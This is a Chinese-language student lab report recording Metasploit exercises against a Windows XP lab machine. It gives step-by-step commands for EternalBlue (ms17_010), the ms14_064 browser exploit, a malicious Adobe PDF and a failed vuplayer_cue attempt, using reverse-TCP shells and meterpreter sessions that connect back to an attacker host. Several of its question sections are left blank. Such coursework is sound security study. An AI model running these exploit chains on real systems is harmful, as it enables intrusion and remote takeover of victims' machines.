目录
实验内容
- 一个主动攻击实践,如ms08_067
- 一个针对浏览器的攻击,如ms11_050
- 一个针对客户端的攻击,如Adobe
- 成功应用任何一个辅助模块
基础问题回答
- 用自己的话解释什么是exploit,payload,encode
- 答:
encode:编码格式
实践总结与体会
离实战还缺些什么技术或步骤?
实践过程记录
一个主动攻击实践:ms17_010
-
cd /usr/share/metasploit-framework/modules/exploits/里找点想尝试的漏洞,比如ms17_010(我在尝试调试我的终端的颜色,有点丑,后面又改回去了)
-
再确定攻击的靶机为自己想攻击的后,利用辅助模块的scanner检测是否符合漏洞条件
use auxiliary/scanner/smb/smb_ms17_010show options查看需要填写的参数,然后设置那些参数run就好啦
-
那攻击一下试试
use exploit/windows/smb/ms17_010_eternalblueset payload generic/shell_reverse_tcp选择攻击载荷show options- 自己填写一下参数
exploit它
-可以尝试使用windows命令行瞅瞅,嗯,充分的展示了我的中文乱码
针对浏览器的攻击:ms14_064
- 攻击一下试试
use exploit/windows/browser/ms14_064_ole_code_executionset payload windows/meterpreter/reverse_tcpset SRVHOST 192.168.121.128不要傻了吧唧的改了SRVPORT ,尤其是跟LPORT一样,当然好奇的的话可以试试set LHOST 192.168.121.128都是攻击机哒set LPORT 5234exploit
- Windows端打开生成的URL,就可以看到一个session 1啦
- 然后我们
Ctrl C一下,再输入sessions -i 1就可以接管我们的XP机器啦
针对客户端的攻击:adobe_toolbutton
- 攻击一下试试
use exploit/windows/fileformat/adobe_toolbuttonset payload windows/meterpreter/reverse_tcpshow options,然后自己填一下吧
- 把生成的
5234msf.pdf拖到靶机 - 打开kali端监听模块
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpshow options,然后自己配置一下吧exploit
- Windows端打开5234msf.pdf文件
再来个针对客户端的攻击:Xenorate
- 找个针对靶机XP的攻击模块:
search Xenorate use exploit/windows/fileformat/vuplayer_cue,info再确认一下
set payload windows/meterpreter/reverse_tcpshow options,再自己手动填写一下
exploit
好的,成功看到一个报错Exploit failed: No encoders encoded the buffer successfully
查了一下资料,普遍是说,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同?